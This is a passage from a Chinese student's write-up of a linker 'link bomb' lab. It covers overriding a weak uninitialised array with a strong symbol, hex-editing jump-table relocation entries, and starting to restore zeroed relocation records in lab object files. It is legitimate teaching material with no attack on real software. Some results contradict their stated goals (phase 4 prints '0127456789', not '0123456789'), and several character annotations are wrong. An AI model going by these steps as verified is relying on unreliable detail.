   7:	e8 00 00 00 00       	callq  0xc
   c:	58                   	pop    %rax

1
2
3

➜  [/home/ywhkkx/ex1.linklab/l2] gcc -m32 -o linkbomb2 main.o phase2.o 
➜  [/home/ywhkkx/ex1.linklab/l2] ./linkbomb2 
1180300330

成功了，最后再看一眼链接后的 linkbomb2

00001256 <do_phase>:
    1256:	55                   	push   %ebp
    1257:	89 e5                	mov    %esp,%ebp
    1259:	e8 b3 ff ff ff       	call   1211 <__x86.get_pc_thunk.ax>
    125e:	05 76 2d 00 00       	add    $0x2d76,%eax /* 因为链接,变具体了 */
        /* 新添 */
    1263:	8d 80 a8 e0 ff ff    	lea    -0x1f58(%eax),%eax 
    1269:	50                   	push   %eax
    126a:	e8 a6 ff ff ff       	call   1215 <yeDfwUkv>
    126f:	58                   	pop    %eax

实验三

创建生成一个名为 “phase3_patch.o” 的二进制可重定位目标文件，使其与 main.o phase3.o 链接后能够运行和输出（且仅输出）自己的学号

模块入口函数 do_phase() 依次遍历一个 COOKIE 字符串（由一组互不相同的英文字母组成，且总长度与学号字符串相同）中的每一字符，并通过一个映射数组将该字符的不同可能 ASCII 编码取值映射为输出字符

char PHASE3_CODEBOOK[256];
void do_phase(){
        const char char cookie[] = PHASE3_COOKIE;
        for( int i=0; i<sizeof(cookie)-1; i++ )
                printf( "%c", PHASE3_CODEBOOK[ (unsigned char)(cookie[i]) ] );
        printf( "\n" );
}

分析 do_phase 函数反汇编指令，获知 COOKIE 字符串（保存于栈帧中的局部字符数组中）的组成内容和起始地址
定位循环结构，根据 cookie 中字符的使用，定位映射数组的引用位置，结合重定位记录，确定映射数组的变量名
通过符号表，发现该数组为一未初始化变量（类型为COM，长度为256字节）
要改变程序输出（为学号），必须改变该映射数组的内容，因此，可利用强弱全局符号的解析规则，在 patch 模块中定义同名且按输出要求正确初始化映射关系的数组变量——从而在链接时替换对原数组的引用

先执行文件：

1	➜ [/home/ywhkkx/ex1.linklab/l3] ./linkbomb3 // 打印了个寂寞

PHASE3_CODEBOOK 未知，没有进行初始化，如果我们想要让 do_phase 打印我们需要的数据，就需要另写一个重定位文件对 PHASE3_CODEBOOK 进行初始化

反汇编 linkbomb3 寻找 COOKIE ：

00001225 <do_phase>:
    1225:	55                   	push   %ebp
    1226:	89 e5                	mov    %esp,%ebp
    1228:	53                   	push   %ebx
    1229:	83 ec 24             	sub    $0x24,%esp
    122c:	e8 9f fe ff ff       	call   10d0 <__x86.get_pc_thunk.bx>
    1231:	81 c3 9f 2d 00 00    	add    $0x2d9f,%ebx
    1237:	65 a1 14 00 00 00    	mov    %gs:0x14,%eax
    123d:	89 45 f4             	mov    %eax,-0xc(%ebp)
    1240:	31 c0                	xor    %eax,%eax
    1242:	c7 45 e9 61 73 74 70 	movl   $0x70747361,-0x17(%ebp) // target
    1249:	c7 45 ed 71 72 77 68 	movl   $0x68777271,-0x13(%ebp) // target
    1250:	66 c7 45 f1 62 66    	movw   $0x6662,-0xf(%ebp) // target
    1256:	c6 45 f3 00          	movb   $0x0,-0xd(%ebp)
    125a:	c7 45 e4 00 00 00 00 	movl   $0x0,-0x1c(%ebp)
    1261:	eb 2b                	jmp    128e <do_phase+0x69>
    1263:	8d 55 e9             	lea    -0x17(%ebp),%edx
    1266:	8b 45 e4             	mov    -0x1c(%ebp),%eax
    1269:	01 d0                	add    %edx,%eax
    126b:	0f b6 00             	movzbl (%eax),%eax
    126e:	0f b6 c0             	movzbl %al,%eax
    1271:	8d 93 70 00 00 00    	lea    0x70(%ebx),%edx
    1277:	0f b6 04 02          	movzbl (%edx,%eax,1),%eax
    127b:	0f be c0             	movsbl %al,%eax
    127e:	83 ec 0c             	sub    $0xc,%esp
    1281:	50                   	push   %eax
    1282:	e8 e9 fd ff ff       	call   1070 <putchar@plt>
    1287:	83 c4 10             	add    $0x10,%esp
    128a:	83 45 e4 01          	addl   $0x1,-0x1c(%ebp)
    128e:	8b 45 e4             	mov    -0x1c(%ebp),%eax
    1291:	83 f8 09             	cmp    $0x9,%eax
    1294:	76 cd                	jbe    1263 <do_phase+0x3e>
    1296:	83 ec 0c             	sub    $0xc,%esp
    1299:	6a 0a                	push   $0xa
    129b:	e8 d0 fd ff ff       	call   1070 <putchar@plt>
    12a0:	83 c4 10             	add    $0x10,%esp
    12a3:	90                   	nop
    12a4:	8b 45 f4             	mov    -0xc(%ebp),%eax
    12a7:	65 33 05 14 00 00 00 	xor    %gs:0x14,%eax
    12ae:	74 05                	je     12b5 <do_phase+0x90>
    12b0:	e8 8b 00 00 00       	call   1340 <__stack_chk_fail_local>
    12b5:	8b 5d fc             	mov    -0x4(%ebp),%ebx
    12b8:	c9                   	leave  
    12b9:	c3                   	ret    
    12ba:	66 90                	xchg   %ax,%ax
    12bc:	66 90                	xchg   %ax,%ax
    12be:	66 90                	xchg   %ax,%ax

COOKIE 在栈中分配（看到与ebp有关的操作，和密之数字，基本猜到了）

1
2
3

1242:	c7 45 e9 61 73 74 70 	movl   $0x70747361,-0x17(%ebp) // target
1249:	c7 45 ed 71 72 77 68 	movl   $0x68777271,-0x13(%ebp) // target
1250:	66 c7 45 f1 62 66    	movw   $0x6662,-0xf(%ebp) // target

In [5]: a=[0x61,0x73,0x74,0x70,0x71,0x72,0x77,0x68,0x62,0x66]

In [6]: data=''

In [7]: for i in range(len(a)):
   ...:     data+=chr(a[i])

1 2	In [9]: data Out[9]: 'astpqrwhbf'

再在 GDB 中看看：

1
2
3

04:0010│     0xffffcf00 ◂— 0x747361fc /* 'astp' >> 由于GDB被0xfc干扰,没有打印出来 */
05:0014│     0xffffcf04 ◂— 'pqrwhbf'
06:0018│     0xffffcf08 ◂— 0x666268 /* 'hbf' */

1 2	pwndbg> x/s 0xffffcf00+1 0xffffcf01: "astpqrwhbf"

文本中的 PHASE3_CODEBOOK 是弱符号（未初始化的全局变量），我们就在 phase3_patch.o 中定义一个强符号来替换它（强符号会优先被定义）

假设我们想让程序输出：YHelow

➜  [/home/ywhkkx/ex1.linklab/l3] readelf -s phase3.o 

Symbol table '.symtab' contains 18 entries:
   Num:    Value  Size Type    Bind   Vis      Ndx Name
     0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND 
     1: 00000000     0 FILE    LOCAL  DEFAULT  ABS phase3.c
     2: 00000000     0 SECTION LOCAL  DEFAULT    2 
     3: 00000000     0 SECTION LOCAL  DEFAULT    4 
     4: 00000000     0 SECTION LOCAL  DEFAULT    5 
     5: 00000000     0 SECTION LOCAL  DEFAULT    6 
     6: 00000000     0 SECTION LOCAL  DEFAULT    8 
     7: 00000000     0 SECTION LOCAL  DEFAULT   10 
     8: 00000000     0 SECTION LOCAL  DEFAULT   11 
     9: 00000000     0 SECTION LOCAL  DEFAULT    9 
    10: 00000000     0 SECTION LOCAL  DEFAULT    1 
    11: 00000020   256 OBJECT  GLOBAL DEFAULT  COM cDBDohBAOo // 获取字符串名称
    12: 00000000   149 FUNC    GLOBAL DEFAULT    2 do_phase
    13: 00000000     0 FUNC    GLOBAL HIDDEN     8 __x86.get_pc_thunk.bx
    14: 00000000     0 NOTYPE  GLOBAL DEFAULT  UND _GLOBAL_OFFSET_TABLE_
    15: 00000000     0 NOTYPE  GLOBAL DEFAULT  UND putchar
    16: 00000000     0 NOTYPE  GLOBAL HIDDEN   UND __stack_chk_fail_local
    17: 00000000     4 OBJECT  GLOBAL DEFAULT    6 phase

1 2	char cDBDohBAOo[256] = "1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111Y01119121111111lloHe11w";

➜  [/home/ywhkkx/ex1.linklab/l3] gcc -m32 -c phase3_patch.c -o phase3_patch.o
➜  [/home/ywhkkx/ex1.linklab/l3] gcc -m32 -o linkbomb3 main.o phase3.o phase3_patch.o
➜  [/home/ywhkkx/ex1.linklab/l3] ./linkbomb3 
YHellow209

实验四

修改二进制可重定位目标文件 “phase4.o” 中相应节中的数据内容（注意不允许修改 .text 节的内容），使其与 main.o 链接后能够运行输出（且仅输出）自己的学号

本阶段学生所拿到的.o文件中的“重定位位置”信息已经被抹除，学生需要根据实际情况确认冲重定位的发生位置，并根据重定位类型对位置信息进行恢复

void do_phase()
{
        const char cookie[] = PHASE4_COOKIE; 
        char c;
        for ( int i = 0; i < sizeof(cookie)-1; i++ ) 
       {
                c = cookie[i];
                switch (c) 
                {
                      // 每个学生的映射关系和case顺序建议不一样
                      case ‘A’: { c = 48; break; } 
                      case ‘B’: { c = 121; break; }
                        …
                      case ‘Z’: { c = 93; break; }
                }
               printf("%c", c);
        }
}

通过分析 do_phase 函数的反汇编程序获知 COOKIE 字符串（保存于栈帧中的局部字符数组中）的组成内容
确定 switch 跳转表在 .rodata 节中的偏移量（“A”，“B”，“C” …… 这些字符都在 .rodata 节中）
定位 COOKIE 中每一字符’c’在switch跳转表中的对应表项（索引为’c’-0x41），将其值设为输出目标学号中对应字符的 case 首指令的偏移量

直接运行：

1 2	➜ [/home/ywhkkx/ex1.linklab/l4] ./linkbomb4 wl0_TZb3vJ

和 实验三 一样的套路，只不过这个在外面包装了 switch-case

故技重施，先反汇编 linkbomb4 寻找 COOKIE ：

00001225 <do_phase>:
    1225:	55                   	push   %ebp
    1226:	89 e5                	mov    %esp,%ebp
    1228:	53                   	push   %ebx
    1229:	83 ec 24             	sub    $0x24,%esp
    122c:	e8 9f fe ff ff       	call   10d0 <__x86.get_pc_thunk.bx>
    1231:	81 c3 9f 2d 00 00    	add    $0x2d9f,%ebx
    1237:	65 a1 14 00 00 00    	mov    %gs:0x14,%eax
    123d:	89 45 f4             	mov    %eax,-0xc(%ebp)
    1240:	31 c0                	xor    %eax,%eax
    1242:	c7 45 e9 42 47 4f 4d 	movl   $0x4d4f4742,-0x17(%ebp) // target
    1249:	c7 45 ed 45 49 55 46 	movl   $0x46554945,-0x13(%ebp) // target
    1250:	66 c7 45 f1 51 4a    	movw   $0x4a51,-0xf(%ebp) // target
    1256:	c6 45 f3 00          	movb   $0x0,-0xd(%ebp)
    125a:	c7 45 e4 00 00 00 00 	movl   $0x0,-0x1c(%ebp)
    1261:	e9 e7 00 00 00       	jmp    134d <.L30+0x19>
    1266:	8d 55 e9             	lea    -0x17(%ebp),%edx
    1269:	8b 45 e4             	mov    -0x1c(%ebp),%eax
    126c:	01 d0                	add    %edx,%eax
    126e:	0f b6 00             	movzbl (%eax),%eax
    1271:	88 45 e3             	mov    %al,-0x1d(%ebp)
    1274:	0f be 45 e3          	movsbl -0x1d(%ebp),%eax
    1278:	83 e8 41             	sub    $0x41,%eax
    127b:	83 f8 19             	cmp    $0x19,%eax
    127e:	0f 87 b5 00 00 00    	ja     1339 <.L30+0x5>
    1284:	c1 e0 02             	shl    $0x2,%eax
    1287:	8b 84 18 ac e0 ff ff 	mov    -0x1f54(%eax,%ebx,1),%eax
    128e:	01 d8                	add    %ebx,%eax
    1290:	ff e0                	jmp    *%eax

这次直接在GDB中获取 COOKIE 了：

1 2	pwndbg> x/xs 0xffffcf00+1 0xffffcf01: "BGOMEIUFQJ"

在 Switch-Case 中：“BGOMEIUFQJ” 对应“跳转表”表项的顺序为：2 7 15 13 5 9 21 6 17 10

先看下汇编：

00001225 <do_phase>:
    1225:	55                   	push   %ebp
    1226:	89 e5                	mov    %esp,%ebp
    1228:	53                   	push   %ebx
    1229:	83 ec 24             	sub    $0x24,%esp
    122c:	e8 9f fe ff ff       	call   10d0 <__x86.get_pc_thunk.bx>
    1231:	81 c3 9f 2d 00 00    	add    $0x2d9f,%ebx
    1237:	65 a1 14 00 00 00    	mov    %gs:0x14,%eax
    123d:	89 45 f4             	mov    %eax,-0xc(%ebp)
    1240:	31 c0                	xor    %eax,%eax
    1242:	c7 45 e9 42 47 4f 4d 	movl   $0x4d4f4742,-0x17(%ebp)
    1249:	c7 45 ed 45 49 55 46 	movl   $0x46554945,-0x13(%ebp)
    1250:	66 c7 45 f1 51 4a    	movw   $0x4a51,-0xf(%ebp)
    1256:	c6 45 f3 00          	movb   $0x0,-0xd(%ebp)
    125a:	c7 45 e4 00 00 00 00 	movl   $0x0,-0x1c(%ebp)
    1261:	e9 e7 00 00 00       	jmp    134d <.L30+0x19>
    1266:	8d 55 e9             	lea    -0x17(%ebp),%edx
    1269:	8b 45 e4             	mov    -0x1c(%ebp),%eax
    126c:	01 d0                	add    %edx,%eax
    126e:	0f b6 00             	movzbl (%eax),%eax
    1271:	88 45 e3             	mov    %al,-0x1d(%ebp)
    1274:	0f be 45 e3          	movsbl -0x1d(%ebp),%eax
    1278:	83 e8 41             	sub    $0x41,%eax
    127b:	83 f8 19             	cmp    $0x19,%eax
    127e:	0f 87 b5 00 00 00    	ja     1339 <.L30+0x5>
    1284:	c1 e0 02             	shl    $0x2,%eax
    1287:	8b 84 18 ac e0 ff ff 	mov    -0x1f54(%eax,%ebx,1),%eax
    128e:	01 d8                	add    %ebx,%eax
    1290:	ff e0                	jmp    *%eax

00001292 <.L4>: 
    1292:	c6 45 e3 54          	movb   $0x54,-0x1d(%ebp) // A >> T
    1296:	e9 9e 00 00 00       	jmp    1339 <.L30+0x5>

0000129b <.L6>:
    129b:	c6 45 e3 77          	movb   $0x77,-0x1d(%ebp) // B >> w
    129f:	e9 95 00 00 00       	jmp    1339 <.L30+0x5>

000012a4 <.L7>:
    12a4:	c6 45 e3 70          	movb   $0x70,-0x1d(%ebp) // C >> p
    12a8:	e9 8c 00 00 00       	jmp    1339 <.L30+0x5>

000012ad <.L8>:
    12ad:	c6 45 e3 36          	movb   $0x36,-0x1d(%ebp) // D >> 6
    12b1:	e9 83 00 00 00       	jmp    1339 <.L30+0x5>

000012b6 <.L9>:
    12b6:	c6 45 e3 54          	movb   $0x54,-0x1d(%ebp) // E >> T
    12ba:	eb 7d                	jmp    1339 <.L30+0x5>

000012bc <.L10>:
    12bc:	c6 45 e3 33          	movb   $0x33,-0x1d(%ebp) // F >> 3
    12c0:	eb 77                	jmp    1339 <.L30+0x5>

000012c2 <.L11>:
    12c2:	c6 45 e3 6c          	movb   $0x6c,-0x1d(%ebp) // G >> l
    12c6:	eb 71                	jmp    1339 <.L30+0x5>

000012c8 <.L12>:
    12c8:	c6 45 e3 34          	movb   $0x34,-0x1d(%ebp) // H >> 4
    12cc:	eb 6b                	jmp    1339 <.L30+0x5>

000012ce <.L13>:
    12ce:	c6 45 e3 5a          	movb   $0x5a,-0x1d(%ebp) // I >> Z 
    12d2:	eb 65                	jmp    1339 <.L30+0x5>

000012d4 <.L14>:
    12d4:	c6 45 e3 4a          	movb   $0x4a,-0x1d(%ebp) // J >> J 
    12d8:	eb 5f                	jmp    1339 <.L30+0x5>

000012da <.L15>:
    12da:	c6 45 e3 51          	movb   $0x51,-0x1d(%ebp) // K >> Q
    12de:	eb 59                	jmp    1339 <.L30+0x5>

000012e0 <.L16>:
    12e0:	c6 45 e3 4d          	movb   $0x4d,-0x1d(%ebp) // L >> M
    12e4:	eb 53                	jmp    1339 <.L30+0x5>

000012e6 <.L17>:
    12e6:	c6 45 e3 5f          	movb   $0x5f,-0x1d(%ebp) // M >> -
    12ea:	eb 4d                	jmp    1339 <.L30+0x5>

000012ec <.L18>:
    12ec:	c6 45 e3 38          	movb   $0x38,-0x1d(%ebp) // N >> 8
    12f0:	eb 47                	jmp    1339 <.L30+0x5>

000012f2 <.L19>:
    12f2:	c6 45 e3 30          	movb   $0x30,-0x1d(%ebp) // O >> 0
    12f6:	eb 41                	jmp    1339 <.L30+0x5>

000012f8 <.L20>:
    12f8:	c6 45 e3 32          	movb   $0x32,-0x1d(%ebp) // P >> 2
    12fc:	eb 3b                	jmp    1339 <.L30+0x5>

000012fe <.L21>:
    12fe:	c6 45 e3 76          	movb   $0x76,-0x1d(%ebp) // Q >> v
    1302:	eb 35                	jmp    1339 <.L30+0x5>

00001304 <.L22>:
    1304:	c6 45 e3 35          	movb   $0x35,-0x1d(%ebp) // R >> 5
    1308:	eb 2f                	jmp    1339 <.L30+0x5>

0000130a <.L23>:
    130a:	c6 45 e3 3c          	movb   $0x3c,-0x1d(%ebp) // S >> <
    130e:	eb 29                	jmp    1339 <.L30+0x5>

00001310 <.L24>:
    1310:	c6 45 e3 39          	movb   $0x39,-0x1d(%ebp) // J >> 9
    1314:	eb 23                	jmp    1339 <.L30+0x5>

00001316 <.L25>:
    1316:	c6 45 e3 62          	movb   $0x62,-0x1d(%ebp) // U >> b
    131a:	eb 1d                	jmp    1339 <.L30+0x5>

0000131c <.L26>:
    131c:	c6 45 e3 57          	movb   $0x57,-0x1d(%ebp) // V >> W
    1320:	eb 17                	jmp    1339 <.L30+0x5>

00001322 <.L27>:
    1322:	c6 45 e3 60          	movb   $0x60,-0x1d(%ebp) // W >> ~
    1326:	eb 11                	jmp    1339 <.L30+0x5>

00001328 <.L28>:
    1328:	c6 45 e3 4d          	movb   $0x4d,-0x1d(%ebp) // X >> M
    132c:	eb 0b                	jmp    1339 <.L30+0x5>

0000132e <.L29>:
    132e:	c6 45 e3 31          	movb   $0x31,-0x1d(%ebp) // Y >> 1
    1332:	eb 05                	jmp    1339 <.L30+0x5>

00001334 <.L30>:
    1334:	c6 45 e3 37          	movb   $0x37,-0x1d(%ebp) // Z >> 7
    1338:	90                   	nop
    1339:	0f be 45 e3          	movsbl -0x1d(%ebp),%eax
    133d:	83 ec 0c             	sub    $0xc,%esp
    1340:	50                   	push   %eax
    1341:	e8 2a fd ff ff       	call   1070 <putchar@plt>
    1346:	83 c4 10             	add    $0x10,%esp
    1349:	83 45 e4 01          	addl   $0x1,-0x1c(%ebp)
    134d:	8b 45 e4             	mov    -0x1c(%ebp),%eax
    1350:	83 f8 09             	cmp    $0x9,%eax
    1353:	0f 86 0d ff ff ff    	jbe    1266 <do_phase+0x41>
    1359:	83 ec 0c             	sub    $0xc,%esp
    135c:	6a 0a                	push   $0xa
    135e:	e8 0d fd ff ff       	call   1070 <putchar@plt>
    1363:	83 c4 10             	add    $0x10,%esp
    1366:	90                   	nop
    1367:	8b 45 f4             	mov    -0xc(%ebp),%eax
    136a:	65 33 05 14 00 00 00 	xor    %gs:0x14,%eax
    1371:	74 05                	je     1378 <.L30+0x44>
    1373:	e8 88 00 00 00       	call   1400 <__stack_chk_fail_local>
    1378:	8b 5d fc             	mov    -0x4(%ebp),%ebx
    137b:	c9                   	leave  
    137c:	c3                   	ret    
    137d:	66 90                	xchg   %ax,%ax
    137f:	90                   	nop

这些奇怪的 L4 L6 L7 就是字符了（主要是因为它们有26个）

“jmp 1339 <.L30+0x5>”应该就是“break”，可以通过 movb 来获取对应的打印数据（已标记）

实验四想要我们修改“phase4.o”，但不让我们修改 .text 节的内容（可执行指令的集合），所以我们只能改 .rodata 节中的“跳转表”

// 可采用以下代码证明：L4 L6 L7 就是 A，B，C，D ……

1 2	➜ [/home/ywhkkx/ex1.linklab/l4] readelf -s phase4.o ➜ [/home/ywhkkx/ex1.linklab/l4] readelf -S phase4.o

用 readelf 打印重定位节：

重定位节 '.rel.rodata' at offset 0x648 contains 26 entries:
 偏移量     信息    类型              符号值      符号名称
00000000  00000a09 R_386_GOTOFF      0000006d   .L4
00000004  00000b09 R_386_GOTOFF      00000076   .L6
00000008  00000c09 R_386_GOTOFF      0000007f   .L7
0000000c  00000d09 R_386_GOTOFF      00000088   .L8
00000010  00000e09 R_386_GOTOFF      00000091   .L9
00000014  00000f09 R_386_GOTOFF      00000097   .L10
00000018  00001009 R_386_GOTOFF      0000009d   .L11
0000001c  00001109 R_386_GOTOFF      000000a3   .L12
00000020  00001209 R_386_GOTOFF      000000a9   .L13
00000024  00001309 R_386_GOTOFF      000000af   .L14
00000028  00001409 R_386_GOTOFF      000000b5   .L15
0000002c  00001509 R_386_GOTOFF      000000bb   .L16
00000030  00001609 R_386_GOTOFF      000000c1   .L17
00000034  00001709 R_386_GOTOFF      000000c7   .L18
00000038  00001809 R_386_GOTOFF      000000cd   .L19
0000003c  00001909 R_386_GOTOFF      000000d3   .L20
00000040  00001a09 R_386_GOTOFF      000000d9   .L21
00000044  00001b09 R_386_GOTOFF      000000df   .L22
00000048  00001c09 R_386_GOTOFF      000000e5   .L23
0000004c  00001d09 R_386_GOTOFF      000000eb   .L24
00000050  00001e09 R_386_GOTOFF      000000f1   .L25
00000054  00001f09 R_386_GOTOFF      000000f7   .L26
00000058  00002009 R_386_GOTOFF      000000fd   .L27
0000005c  00002109 R_386_GOTOFF      00000103   .L28
00000060  00002209 R_386_GOTOFF      00000109   .L29
00000064  00002309 R_386_GOTOFF      0000010f   .L30

获取各个元素的节内偏移

➜  [/home/ywhkkx/ex1.linklab/l4] readelf -S phase4.o
There are 18 section headers, starting at offset 0x7cc:

节头：
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .group            GROUP           00000000 000034 000008 04     15  39  4
  [ 2] .text             PROGBITS        00000000 00003c 000158 00  AX  0   0  1
  [ 3] .rel.text         REL             00000000 000618 000030 08   I 15   2  4
  [ 4] .data             PROGBITS        00000000 000194 000000 00  WA  0   0  1
  [ 5] .bss              NOBITS          00000000 000194 000000 00  WA  0   0  1
  [ 6] .rodata           PROGBITS        00000000 000194 000068 00   A  0   0  4
  [ 7] .rel.rodata       REL             00000000 000648 0000d0 08   I 15   6  4

“.rel.rodata ”的偏移为“000648”，

现在可以用 hexedit 进行修改了，主要关注偏移为“000648”的地方，目的是交换’.rel.rodata’的信息，以改变重定位值，进而改变输出值：

00000640   4F 01 00 00  02 2A 00 00  00 00 00 00  09 0A 00 00  O....*..........
00000650   04 00 00 00  09 0B 00 00  08 00 00 00  09 0C 00 00  ................
00000660   0C 00 00 00  09 0D 00 00  10 00 00 00  09 0E 00 00  ................
00000670   14 00 00 00  09 0F 00 00  18 00 00 00  09 10 00 00  ................
00000680   1C 00 00 00  09 11 00 00  20 00 00 00  09 12 00 00  ........ .......

cookie：BGOMEIUFQJ
对应符号名称：L6 L11 L19 L17 L9 L13 L25 L10 L21 L14
原本的输出：wl0_TZb3vJ

假设我们想输出：0123456789

对应符号名称：L19 L29 L20 L10 L12 L22 L8 L30 L18 L24

然后用 hexedit 做出调换：L6->L19，L11->L29，L19->L20 ……….

00000640   4F 01 00 00  02 2A 00 00  00 00 00 00  09 0A 00 00  O....*..........
00000650   04 00 00 00  09 18 00 00  08 00 00 00  09 0C 00 00  ................
00000660   0C 00 00 00  09 0D 00 00  10 00 00 00  09 11 00 00  ................
00000670   14 00 00 00  09 23 00 00  18 00 00 00  09 22 00 00  .....#......."..
00000680   1C 00 00 00  09 11 00 00  20 00 00 00  09 1B 00 00  ........ .......
00000690   24 00 00 00  09 1D 00 00  28 00 00 00  09 14 00 00  $.......(.......
000006A0   2C 00 00 00  09 15 00 00  30 00 00 00  09 23 00 00  ,.......0....#..
000006B0   34 00 00 00  09 17 00 00  38 00 00 00  09 19 00 00  4.......8.......
000006C0   3C 00 00 00  09 19 00 00  40 00 00 00  09 17 00 00  <.......@.......
000006D0   44 00 00 00  09 1B 00 00  48 00 00 00  09 1C 00 00  D.......H.......
000006E0   4C 00 00 00  09 1D 00 00  50 00 00 00  09 0D 00 00  L.......P.......
000006F0   54 00 00 00  09 1F 00 00  58 00 00 00  09 20 00 00  T.......X.... ..
00000700   5C 00 00 00  09 21 00 00  60 00 00 00  09 22 00 00  \....!..`...."..
00000710   64 00 00 00  09 23 00 00  00 00 00 00  01 26 00 00  d....#.......&..

1
2
3

➜  [/home/ywhkkx/ex1.linklab/l4] gcc -m32 -o linkbomb4 main.o phase4.o
➜  [/home/ywhkkx/ex1.linklab/l4] ./linkbomb4                          
0127456789

实验五

修改二进制可重定位目标文件“phase5.o”的重定位节中的数据内容（不允许修改.text节的内容），补充完成其中被清零的一些重定位记录（分别对应于本模块中需要重定位的符号引用），使其与 main.o 链接后能够正确输出（且仅输出）自己学号

const int TRAN_ARRAY[] = {… …};
const char FDICT[] = FDICTDAT;
char BUF[] = MYID; 
char CODE = PHASE5_COOKIE;

int transform_code( int code, int mode )  {
    switch( TRAN_ARRAY [mode] & 0x00000007 )  {
        case 0:
            code = code & (~ TRAN_ARRAY[mode]);
            break;
        case 1:
            code = code ^ TRAN_ARRAY[mode];
            break;
        … …
    }
    return code;
}

void generate_code( int cookie )  {
    int i;
    CODE = cookie;
    for( i=0; i<sizeof(TRAN_ARRAY)/sizeof(int); i++ )
          CODE = transform_code( CODE, i );
}

int encode( char* str )  {
    int i, n = strlen(str);
    for( i=0; i<n; i++ ) {
        str[i] = (FDICT[str[i]] ^ CODE) & 0x7F;
        if( str[i]<0x20 || str[i]>0x7E ) str[i] = ' ';
    }
    return n;
}

void do_phase()  {
    generate_code(PHASE5_COOKIE);
    encode(BUF);
    printf("%s\n", BUF);
}

对照 phase5.o 的反汇编程序及已有重定位记录，定位每一空重定位记录可能对应的符号引用
对每一待处理的符号引用，按照下列重定位记录结构，构造其二进制表示（8字节块）
使用 hexedit 或编程将生成的重定位记录写入到相应被清空的记录位置中

直接运行程序：（报错了）

1
2
3

➜  [/home/ywhkkx/ex1.linklab/l5] gcc -m32 -o linkbomb5 main.o phase5.o 
➜  [/home/ywhkkx/ex1.linklab/l5] ./linkbomb5 
[1]    4179 illegal hardware instruction (core dumped)  ./linkbomb5

可能实验五就是为了让我们修复程序，一般段错误有以下原因：

未对相关引用进行必要的重定位（实验PTT给出了这个）

用GDB单步排查：

1	Invalid instructions at 0x56556399

“do_phase”出问题了，但不知道是什么问题（其实大概率是重定位的问题，实验给了提示）

看一下重定位表：

➜  [/home/ywhkkx/ex1.linklab/l5] readelf -r phase5.o

重定位节 '.rel.text' at offset 0x6e8 contains 27 entries:
 偏移量     信息    类型              符号值      符号名称
00000000  00000000 R_386_NONE       
00000009  00001b0a R_386_GOTPC       00000000   _GLOBAL_OFFSET_TABLE_
00000013  00001509 R_386_GOTOFF      00000000   CmhNnM
00000000  00000000 R_386_NONE       
00000000  00000000 R_386_NONE       
0000004c  00001509 R_386_GOTOFF      00000000   CmhNnM
0000005d  00001509 R_386_GOTOFF      00000000   CmhNnM
00000000  00000000 R_386_NONE       
0000007e  00001509 R_386_GOTOFF      00000000   CmhNnM
00000000  00000000 R_386_NONE       
0000009e  00001b0a R_386_GOTPC       00000000   _GLOBAL_OFFSET_TABLE_
000000a7  00001809 R_386_GOTOFF      0000000b   CODE
00000000  00000000 R_386_NONE       
00000000  00000000 R_386_NONE       
000000cc  00001809 R_386_GOTOFF      0000000b   CODE
000000ea  00001d02 R_386_PC32        00000000   __x86.get_pc_thunk.bx
00000000  00000000 R_386_NONE       
000000fb  00001f04 R_386_PLT32       00000000   strlen
00000120  00001609 R_386_GOTOFF      00000040   cRvFVR
00000127  00001809 R_386_GOTOFF      0000000b   CODE
00000000  00000000 R_386_NONE       
00000189  00001b0a R_386_GOTPC       00000000   _GLOBAL_OFFSET_TABLE_
00000193  00001c02 R_386_PC32        00000090   generate_code
0000019f  00001709 R_386_GOTOFF      00000000   BUF
000001a5  00001e02 R_386_PC32        000000e2   encode
000001b1  00001709 R_386_GOTOFF      00000000   BUF
000001b7  00002104 R_386_PLT32       00000000   puts

重定位节 '.rel.rodata' at offset 0x7c0 contains 8 entries:
 偏移量     信息    类型              符号值      符号名称
000000c0  00000c09 R_386_GOTOFF      0000002d   .L3
000000c4  00000d09 R_386_GOTOFF      00000032   .L5
000000c8  00000a09 R_386_GOTOFF      00000087   .L2
000000cc  00000e09 R_386_GOTOFF      00000046   .L6
000000d0  00000f09 R_386_GOTOFF      00000057   .L7
000000d4  00001009 R_386_GOTOFF      00000069   .L8
000000d8  00000a09 R_386_GOTOFF      00000087   .L2
000000dc  00001109 R_386_GOTOFF      00000078   .L9

重定位节 '.rel.data.rel.local' at offset 0x800 contains 1 entry:
 偏移量     信息    类型              符号值      符号名称
00000000  00002001 R_386_32          0000017b   do_phase

重定位节 '.rel.eh_frame' at offset 0x808 contains 6 entries:
 偏移量     信息    类型              符号值      符号名称
00000020  00000202 R_386_PC32        00000000   .text
00000040  00000202 R_386_PC32        00000000   .text
00000064  00000202 R_386_PC32        00000000   .text
00000088  00000202 R_386_PC32        00000000   .text
000000ac  00000702 R_386_PC32        00000000   .text.__x86.get_pc_thu
000000c0  00000802 R_386_PC32        00000000   .text.__x86.get_pc_thu

发现很多条目空着的，需要补全

➜  [/home/ywhkkx/ex1.linklab/l5] readelf -S phase5.o
There are 20 section headers, starting at offset 0x8f0:

节头：
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .group            GROUP           00000000 000034 000008 04     17  26  4
  [ 2] .group            GROUP           00000000 00003c 000008 04     17  29  4
  [ 3] .text             PROGBITS        00000000 000044 0001c4 00  AX  0   0  1
  [ 4] .rel.text         REL             00000000 0006e8 0000d8 08   I 17   3  4
  [ 5] .data             PROGBITS        00000000 000208 00000c 00  WA  0   0  4
  [ 6] .bss              NOBITS          00000000 000214 000000 00  WA  0   0  1
  [ 7] .rodata           PROGBITS        00000000 000220 0000e0 00   A  0   0 32
  [ 8] .rel.rodata       REL             00000000 0007c0 000040 08   I 17   7  4

“.rel.rodata”偏移为“0x7c0”，“.rel.text”偏移为“0x6e8”

在 hexedit 中看看：

000006D0   64 65 00 73  74 72 6C 65  6E 00 64 6F  5F 70 68 61  de.strlen.do_pha
000006E0   73 65 00 70  75 74 73 00  00 00 00 00  00 00 00 00  se.puts.........
000006F0   09 00 00 00  0A 1B 00 00  13 00 00 00  09 15 00 00  ................
00000700   00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  ................
00000710   4C 00 00 00  09 15 00 00  5D 00 00 00  09 15 00 00  L.......].......
00000720   00 00 00 00  00 00 00 00  7E 00 00 00  09 15 00 00  ........~.......

